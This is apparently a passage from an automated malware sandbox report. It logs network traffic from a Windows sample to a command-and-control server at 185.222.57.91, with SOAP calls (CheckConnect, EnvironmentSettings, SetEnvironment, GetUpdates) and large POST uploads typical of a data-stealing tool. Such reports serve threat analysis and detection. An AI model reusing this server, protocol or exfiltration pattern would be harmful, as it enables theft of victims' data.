                      Aug 30, 2024 08:02:22.476167917 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476222992 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476231098 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476238966 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476247072 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476281881 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476341009 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476350069 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476356983 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476402998 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476411104 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476457119 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476465940 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476474047 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476500034 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476516008 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476524115 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476577997 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476587057 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476697922 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476706982 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476803064 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476810932 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476829052 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476836920 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476844072 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476852894 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476911068 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476917982 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476937056 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476947069 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476962090 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.476969957 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477184057 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477191925 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477205992 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477214098 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477217913 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477225065 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477227926 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477235079 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477245092 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477251053 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477267981 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477274895 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477281094 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477324963 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477332115 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477346897 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477355003 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477365017 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477400064 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477407932 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477442026 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477449894 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477475882 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477484941 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477493048 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477571964 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477580070 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477586985 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477602959 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477611065 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477619886 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477655888 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477672100 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477679014 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477694988 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477704048 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477802992 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477811098 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477818966 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477827072 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477865934 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477874041 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477880955 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477888107 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477932930 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477941990 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477948904 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477957010 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477972031 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.477983952 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478014946 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478023052 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478043079 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478050947 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478065968 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478071928 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478113890 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478121996 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478147984 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478156090 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478194952 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478203058 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478219032 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478225946 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478243113 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478292942 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478301048 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478347063 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478355885 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478363991 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478369951 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478377104 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478384018 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478473902 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478482962 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478490114 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478497028 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478503942 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478507042 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478513002 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478519917 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478527069 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478533983 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478586912 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478595018 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478601933 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478610039 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478617907 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478625059 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478631973 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478638887 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478641987 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478645086 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478652000 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478667021 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478673935 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478681087 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478718042 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478727102 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478729010 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478732109 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478734970 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478738070 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478739977 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478796959 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478805065 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478811979 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478818893 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478826046 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478832960 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478836060 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478842974 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478852034 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478858948 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478868008 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478874922 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478889942 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478897095 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478904009 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478912115 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478914976 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478967905 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478976011 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478982925 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478990078 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478992939 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.478998899 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479006052 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479079008 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479085922 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479094028 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479100943 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479118109 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479125977 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479135990 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479144096 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479146957 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479238033 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479245901 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479249001 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479255915 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479263067 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479290962 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479300022 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479306936 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479314089 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479321957 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479329109 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479343891 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479351044 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479360104 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479393005 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479474068 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479513884 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479521036 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479557037 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479564905 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479573011 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479579926 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479645967 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479654074 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479698896 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479706049 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479758978 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479767084 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479773998 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479790926 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479896069 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479904890 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479912043 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479921103 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479928017 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479958057 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.479964972 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480000019 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480009079 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480025053 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480031967 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480079889 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480087996 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480129004 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480137110 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480181932 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.480189085 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:22.527046919 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:24.338779926 CEST5561549724185.222.57.91192.168.2.5
                      Aug 30, 2024 08:02:24.351757050 CEST4972455615192.168.2.5185.222.57.91
                      Aug 30, 2024 08:02:24.351897001 CEST4972355615192.168.2.5185.222.57.91

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Aug 30, 2024 08:02:08.407766104 CEST6528853192.168.2.51.1.1.1
                      Aug 30, 2024 08:02:38.223860025 CEST5356494162.159.36.2192.168.2.5
                      Aug 30, 2024 08:02:38.729798079 CEST53588791.1.1.1192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Aug 30, 2024 08:02:08.407766104 CEST192.168.2.51.1.1.10x84e0Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Aug 30, 2024 08:02:08.414952993 CEST1.1.1.1192.168.2.50x84e0No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • 185.222.57.91:55615

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549711185.222.57.91556151492C:\Users\user\Desktop\tfF3UBTdr8.exe
                      TimestampBytes transferredDirectionData
                      Aug 30, 2024 08:02:01.976151943 CEST240OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.57.91:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Aug 30, 2024 08:02:02.560324907 CEST25INHTTP/1.1 100 Continue
                      Aug 30, 2024 08:02:02.695832968 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:01 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Aug 30, 2024 08:02:07.767960072 CEST223OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.57.91:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:08.075649023 CEST25INHTTP/1.1 100 Continue
                      Aug 30, 2024 08:02:08.278203011 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 6625
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:08 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>202.10.61.127</b:string><b:string>183.155.33.34</b:string><b:string>103.138.49.24</b:string><b:string>36.26.100.62</b:string><b:string>49.89.92.98</b:string><b:string>183.208.114.83</b:string><b:string>139.186.206.86</b:string><b:string>49.74.245.112</b:string><b:string>183.151.6.172</b:string><b:string>91.192.81.11</b:string><b:string>222.247.0.195</b:string><b:string>115.150.176.197</b:string><b:string>116.4.200.54</b:string><b:string>13.89.107.79</b:string><b:string>58.253.61.2</b:string><b:string>119.126.114.250</b:string><b:string>34.141.245.25</b:string><b:string>20.99.160.173</b:string [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549714185.222.57.91556151492C:\Users\user\Desktop\tfF3UBTdr8.exe
                      TimestampBytes transferredDirectionData
                      Aug 30, 2024 08:02:11.114465952 CEST221OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.57.91:55615
                      Content-Length: 953303
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:12.654634953 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:12 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                      Aug 30, 2024 08:02:12.656995058 CEST217OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.57.91:55615
                      Content-Length: 953295
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Aug 30, 2024 08:02:13.396997929 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Fri, 30 Aug 2024 06:02:12 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549718185.222.57.91556156784C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      TimestampBytes transferredDirectionData
                      Aug 30, 2024 08:02:12.125240088 CEST240OUTPOST / HTTP/1.1
